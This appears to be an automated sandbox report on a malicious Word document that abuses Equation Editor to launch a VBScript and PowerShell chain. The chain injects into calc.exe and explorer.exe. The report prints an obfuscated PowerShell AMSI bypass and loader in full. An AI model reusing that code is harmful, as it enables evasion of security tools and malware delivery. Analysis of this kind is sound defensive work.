Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like 'iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like 'Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041E99D push fs; ret	11_2_0041E99F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00416BC6 push esp; iretd	11_2_00416BDB
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041EB8A push dword ptr [AD487281h]; ret	11_2_0041EE6B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041D4B5 push eax; ret	11_2_0041D508
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041D56C push eax; ret	11_2_0041D572
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041D502 push eax; ret	11_2_0041D508
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041D50B push eax; ret	11_2_0041D572
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041BE96 push ss; retf	11_2_0041BE99
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00417740 push FFFFFFDAh; ret	11_2_00417742
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041EFC8 push esp; ret	11_2_0041F011
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4DFA1 push ecx; ret	11_2_00B4DFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00B8262B push ecx; ret	13_2_00B8263E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DDFA1 push ecx; ret	13_2_022DDFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008E99D push fs; ret	13_2_0008E99F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008EB8A push dword ptr [AD487281h]; ret	13_2_0008EE6B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00086BC6 push esp; iretd	13_2_00086BDB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008DC2C push ecx; ret	13_2_0008DC2D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008D4B5 push eax; ret	13_2_0008D508
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008D50B push eax; ret	13_2_0008D572
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008D502 push eax; ret	13_2_0008D508
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008D56C push eax; ret	13_2_0008D572
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008BE96 push ss; retf	13_2_0008BE99
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00087740 push FFFFFFDAh; ret	13_2_00087742
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008EFC8 push esp; ret	13_2_0008F011

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Windows Analysis Report RFQ-CIF DT22.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Windows\SysWOW64\calc.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\calc.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000000079B7E second address: 0000000000079B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2680	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 800	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2808	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp	Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 0000000C.00000000.490369048.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B526F8 mov eax, dword ptr fs:[00000030h]	11_2_00B526F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022C0080 mov ecx, dword ptr fs:[00000030h]	13_2_022C0080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022C00EA mov eax, dword ptr fs:[00000030h]	13_2_022C00EA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E26F8 mov eax, dword ptr fs:[00000030h]	13_2_022E26F8

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 7EFDE008	Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe	Thread register set: target process: 1764	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Thread register set: target process: 1764	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 1764	Jump to behavior

Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<